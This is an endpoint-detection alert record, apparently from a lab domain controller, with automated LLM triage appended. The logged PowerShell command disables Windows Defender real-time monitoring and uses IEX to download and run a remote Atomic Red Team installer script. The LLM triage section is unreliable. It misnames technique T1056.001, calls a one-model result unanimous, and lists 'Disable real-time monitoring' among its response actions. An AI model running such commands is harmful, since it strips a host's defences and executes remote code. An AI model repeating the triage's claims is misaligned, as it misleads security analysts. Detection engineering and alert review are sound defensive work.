{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 193449984,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld6D5F.tmp.bat T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4567040,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 2440,
        "THIS_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "THREADS": 3,
        "TIMESTAMP": 1774364725358,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 2440,
      "PROCESS_ID": 3164,
      "THREADS": 32,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
      "event_time": 1774364726507,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3164,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "0c13305cb3f73d15515e789969c2a835",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "6b593eddb775332b5050941f69c2a838"
    }
  },
  "detect_id": "80f1d0a8-0179-462d-8a28-21cf69c2a839",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364729672,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364726\u0026selected=6b593eddb775332b5050941f69c2a838",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
    "event_time": 1774364726507,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3164,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "0c13305cb3f73d15515e789969c2a835",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "6b593eddb775332b5050941f69c2a838"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364729000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by the Atomic Red Team framework?",
    "Were any files modified or downloaded to disk during this session?",
    "Is there evidence of lateral movement from this SYSTEM process?",
    "Was this execution part of a larger attack chain?"
  ],
  "ioc_analysis": "The process is running legitimate Windows PowerShell.exe but executing highly suspicious commands including Set-MpPreference to disable real-time monitoring, IEX (Invoke-Expression) to download and execute remote scripts, and Atomic Red Team framework installation. The command line contains clear indicators of malicious intent: disabling security controls and downloading code from an external source.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Install-AtomicRedTeam -Force -getAtomics",
    "Invoke-AtomicTest T1056.001"
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1059.003",
    "T1078.004",
    "T1562.001"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Isolate the host immediately from network access",
    "Block all outbound connections to GitHub and known malicious domains",
    "Disable real-time monitoring on this host",
    "Preserve memory dumps for forensic analysis",
    "Review user activity logs for additional compromise indicators"
  ],
  "risk_score": 90,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell under SYSTEM privileges that disables real-time monitoring and downloads the Atomic Red Team framework via IEX. The command line explicitly shows malicious behavior including disabling antivirus protection and executing remote code from an untrusted GitHub repository.\n\n**IOC Analysis:** The process is running legitimate Windows PowerShell.exe but executing highly suspicious commands including Set-MpPreference to disable real-time monitoring, IEX (Invoke-Expression) to download and execute remote scripts, and Atomic Red Team framework installation. The command line contains clear indicators of malicious intent: disabling security controls and downloading code from an external source.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.7\nThe detection event involves a PowerShell process running from a legitimate system path with a malicious command line that attempts to disable Windows Defender and download attack scripts. Despite the file being signed and in a known-good location, the behavior is highly suspicious and aligns with known adversary tactics.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a legitimate Microsoft-signed binary in its expected directory, but the command line includes malicious actions such as disabling real-time monitoring and downloading scripts from GitHub, indicating potential compromise. The HASH is signed, but the behavior overrides this legitimacy. The command line references MITRE technique T1056.001 (Disabling System Security).",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}